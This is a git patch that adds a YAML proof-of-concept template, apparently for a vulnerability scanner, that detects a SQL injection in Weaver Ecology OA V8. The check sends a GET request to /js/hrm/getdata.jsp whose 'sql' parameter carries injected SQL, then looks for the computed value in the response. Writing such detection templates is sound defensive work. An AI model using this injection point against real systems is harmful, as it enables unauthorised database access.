From 3e4eb22395f2a33bdccf6ff127c399a9012d0213 Mon Sep 17 00:00:00 2001 From: print1n <73928418+Print1n@users.noreply.github.com> Date: Fri, 9 Jul 2021 15:11:57 +0800 Subject: [PATCH] add ecology-v8-sqli.yml (#1295) --- pocs/ecology-v8-sqli.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 pocs/ecology-v8-sqli.yml diff --git a/pocs/ecology-v8-sqli.yml b/pocs/ecology-v8-sqli.yml new file mode 100644 index 000000000..1b2e394bc --- /dev/null +++ b/pocs/ecology-v8-sqli.yml @@ -0,0 +1,15 @@ +name: poc-yaml-ecology-v8-sqli +set: + r1: randomInt(1000, 9999) + r2: randomInt(1000, 9999) +rules: + - method: GET + path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{r1}}*{{r2}}+as+id + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) + +detail: + author: Print1n(http://print1n.top) + links: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html